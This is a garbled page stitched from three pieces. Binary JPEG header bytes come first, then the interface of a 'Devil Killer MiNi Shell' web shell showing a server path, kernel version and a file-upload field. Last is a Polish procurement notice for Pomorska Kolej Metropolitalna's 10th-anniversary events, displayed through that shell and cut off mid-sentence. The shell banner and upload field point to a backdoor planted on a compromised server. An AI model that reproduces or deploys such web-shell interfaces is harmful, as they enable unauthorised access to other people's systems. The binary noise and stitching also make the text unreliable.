JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250527/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250527/0025020701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja i koordynacja wydarzeń z okazji 10-lecia linii PKM oraz działania informacyjno - promocyjne z nimi związane - z podziałem na 2 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pomorska Kolej Metropolitalna S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 221037360</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Budowlanych 77</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-298</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 3501114</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pkm-sa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pkm-sa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Obsługa infrastruktury kolejowej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja i koordynacja wydarzeń z okazji 10-lecia linii PKM oraz działania informacyjno - promocyjne z nimi związane - z podziałem na 2 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb503ed7-2d5f-49df-9582-6eae81bc53bf</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00250207</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1111206 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w szczególności składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień, wymiana informacji oraz przekazywanie dokumentów między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu Platformy, pod adresem: https://platformazakupowa.pl/transakcja/1111206 <br/><br/>Za datę wpływu oświadczeń, wniosków, zawiadomień informacji oraz dokumentów przyjmuje się datę ich wpływu na Platformę.<br/><br/><br/>W uzasadnionych przypadkach, uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zamowienia@pkm-sa.pl (nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane winny być za pośrednictwem Platformy zakupowej za pomocą formularza „Wyślij wiadomość do zamawiającego”.<br/>2.Platforma umożliwia złożenie oferty bez zakładania konta. <br/>3. Wykonawca nie posiadający konta na Platformie ma obowiązek potwierdzić, do czasu zakończenia terminu składania ofert, adres mailowy podany w formularzu, poprzez kliknięcie w link aktywacyjny wysłany w mailu potwierdzającym złożenie oferty. Niedopełnienie tego obowiązku może skutkować odrzuceniem oferty przez Zamawiającego, gdyż kontakt z Wykonawcą nie będzie uwierzytelniony. <br/>4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. <br/>5. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>6.Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego: Platforma zakupowa, tel. + 48 22 101 02 02, e-mail: cwk@platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Pomorska Kolej Metropolitalna S.A. <br/>ul. Budowlanych 77, 80-298 Gdańsk, wpisana do rejestru przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy Gdańsk – Północ w Gdańsku, VII Wydział Gospodarczy Krajowego Rejestru Sądowego, pod numerem KRS 0000365210, NIP: 583-310-36-72, REGON: 221037360, tel. 58 350 11 00, sekretariat@pkm-sa.pl;<br/>2.	W PKM S.A. powołano Inspektora Ochrony Danych (IOD). Kontakt do IOD: adres e-mail: iod@pkm-sa.pl lub na adres siedziby Administratora;<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego pn. „Organizacja i koordynacja wydarzeń z okazji 10-lecia linii PKM oraz działania informacyjno - promocyjne z nimi związane - z podziałem na 2 części”oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji, prowadzonego w trybie przetargu nieograniczonego;<br/>4.	Odbiorcami Pani/Pana danych osobowych będą podmioty, z którymi Administrator zawarł stosowne umowy w zakresie np. usług informatycznych, prawnych, archiwizacyjnych, doradczych oraz podmioty uprawnione do uzyskania danych na podstawie obowiązujących przepisów prawa, np. banki, sądy, organy ścigania lub instytucje państwowe, gdy wystąpią z żądaniem, w oparciu o stosowną podstawę prawną. Odbiorcami Pani/Pana danych osobowych będą też osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp;<br/>5.	Pani/Pana dane osobowe będą przechowywane do czasu zakończenia obowiązującego nas okresu archiwizacji; <br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratorów ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9.	Nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>10.	Jednocześnie przypominamy o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PKM/DO/ZU/350/3/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 - Organizacja i koordynacja wydarzeń z okazji 10-lecia linii PKM wraz z towarzyszącą im kampanią informacyjno-promocyjną w mediach.<br/><br/>1)	Przedmiotem zamówienia w Części nr 1 jest zorganizowanie Dnia Otwartego PKM z okazji 10 rocznicy uruchomienia nowej linii kolejowej na Pomorzu oraz przeprowadzenie kampanii informacyjno-promocyjnej tego wydarzenia w mediach.<br/>2)	W ramach przedmiotu zamówienia Wykonawca ma zorganizować i zapewnić kompleksową obsługę wydarzeń organizowanych z okazji 10-lecia funkcjonowania linii Pomorskiej Kolei Metropolitalnej. Wydarzenie odbędzie się na terenie siedziby PKM SA w Gdańsku Matarni. Przewidywanym terminem Wydarzenia jest dzień 6 września 2025 r. (sobota), w godz. 9:00-15:00<br/>3)	Zakres zamówienia obejmuje:<br/>1.1.Opracowanie Scenariusza Dnia Otwartego PKM z okazji 10-lecia linii kolejowej;<br/>1.2.Zorganizowanie Wydarzenia zgodnie z zaakceptowanym przez Zamawiającego Scenariuszem;<br/>1.3.Koordynację wydarzeń towarzyszących, odbywających się w tym samym dniu (foto spacer, przejazdy pociągu specjalnego SKM, audycja i koncert Radia Gdańsk);<br/>1.4.Przygotowanie oprawy graficznej wydarzenia (plakaty, banery, itp.) spójnej z kampanią informacyjno-promocyjną;<br/>1.5.Przeprowadzenie kampanii informacyjno-promocyjnej w mediach zapowiadającej ww. wydarzenia oraz podsumowującej 10 lat PKM. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79341000-6 - Usługi reklamowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79341400-0 - Usługi prowadzenia kampanii reklamowych</p> <p class="mb-0">79340000-9 - Usługi reklamowe i marketingowe</p> <p class="mb-0">79342200-5 - Usługi w zakresie promocji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1: Cena 60%<br/>Kryterium 2: Wstępna koncepcja kampanii promocyjnej i organizacji dnia otwartego 40%<br/>Podkryterium 2.1.: Nowoczesna forma / atrakcyjność wizualna 20%<br/>Podkryterium 2.2.: Spójność z wizerunkiem PKM 20%<br/>Szczegółowy opis kryteriów oceny ofert określono w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wstępna koncepcja kampanii promocyjnej i organizacji dnia otwartego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 - Usługi fotograficzne i wideo związane z obchodami 10-lecia linii PKM.<br/>1)Przedmiotem zamówienia w Części nr 2 jest realizacja materiałów wideo dotyczących działalności Pomorskiej Kolei Metropolitalnej, obsługa fotograficzna i wideo wydarzenia 10-lecia linii PKM i organizacja z tej okazji wydarzeń, kierowanych do miłośników kolei.<br/>2)W ramach przedmiotu zamówienia w Części nr 2 Wykonawca ma zapewnić kompleksową obsługę fotograficzną i wideo, w związku z obchodami 10-lecia funkcjonowania linii Pomorskiej Kolei Metropolitalnej.<br/>3)Zakres zamówienia obejmuje:<br/>1.1.Produkcję filmu podsumowującego 10-lecie linii PKM;<br/>1.2.Produkcję nowego filmu promocyjnego PKM;<br/>1.3.Obsługę fotograficzną i wideo Dnia Otwartego z okazji 10-lecia linii PKM,;<br/>1.4.Organizację fotospaceru podczas dnia otwartego z okazji 10-lecia linii PKM.<br/>1.5.Organizację warsztatów fotografii mobilnej podczas dnia otwartego z okazji 10-lecia linii PKM </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79341000-6 - Usługi reklamowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">79340000-9 - Usługi reklamowe i marketingowe</p> <p class="mb-0">79342200-5 - Usługi w zakresie promocji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1: Cena 60%<br/>Kryterium 2: Wstępna koncepcja scenariuszy materiałów filmowych 40%<br/>Podkryterium 2.1.: Nowoczesna forma / atrakcyjność wizualna 20%<br/>Podkryterium 2.2.: Spójność z wizerunkiem PKM 20%<br/>Szczegółowy opis kryteriów oceny ofert określono w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wstępna koncepcja scenariuszy materiałów filmowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale V SWZ oraz spełniają warunki udziału w postępowaniu, dotyczące:<br/>zdolności technicznej lub zawodowej:<br/>Dotyczy części nr 1:<br/>1.Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 2 (dwie) usługi w zakresie promocji lub marketingu lub realizacji kampanii promocyjnej produktu/ów lub miejsca lub wydarzenia o minimalnej wartości (brutto) 75 000 zł każda.<br/>Uwaga:<br/>i.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek musi spełniać w całości przynajmniej jeden z Wykonawców, i który zrealizuje usługi, do realizacji których te zdolności są wymagane.<br/>ii.Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych innego podmiotu, w myśl art. 118 ustawy Pzp, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot.<br/>iii.W przypadku, gdy za wykonane przez Wykonawcę usługi rozliczenie nastąpiło w innej niż w PLN walucie, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu zobowiązany jest do przeliczenia wartości wykonanych kampanii przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego opublikowanych na dzień zamieszczenia ogłoszenia o zamówieniu oraz SIWZ na stronie Zamawiającego.<br/>oraz<br/>2.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że będzie dysponował co najmniej czterema (4) osobami, które będą brały udział w realizacji zamówienia z których:<br/>1)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za przygotowanie kreacji kampanii promocyjnych lub miejsca lub produktu/ów lub wydarzenia;<br/>2)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za realizację kampanii promocyjnej miejsca lub produktu/ów lub wydarzenia w prasie lub mediach elektronicznych lub na nośnikach reklamy zewnętrznej;<br/>3)co najmniej dwie (2) osoby, w okresie ostatnich 3 lat przed upływem terminu składania ofert, były odpowiedzialne za organizację lub realizację otwartego wydarzenia plenerowego, w ramach którego odbywały się animacje i inne formy aktywacji uczestników.<br/>Uwaga:<br/>i.	Zamawiający dopuszcza, aby jedna osoba pełniła więcej niż jedną funkcję, o ile spełnia wymagania stawiane osobom przewidzianym do pełnienia tych funkcji.<br/>ii.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek udziału w postępowaniu może zostać spełniony łącznie.<br/><br/><br/>Dotyczy części nr 2:<br/>1.Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie:<br/>1)	co najmniej 3 (trzy) usługi w zakresie wideo i foto promocji wydarzenia o minimalnej wartości (brutto) 20 000 zł każde;<br/>oraz<br/>2)	co najmniej 3 (trzy) usługi w zakresie produkcji filmów promocyjnych z wykorzystaniem ujęć z drona, o minimalnej wartości (brutto) 5 000 zł 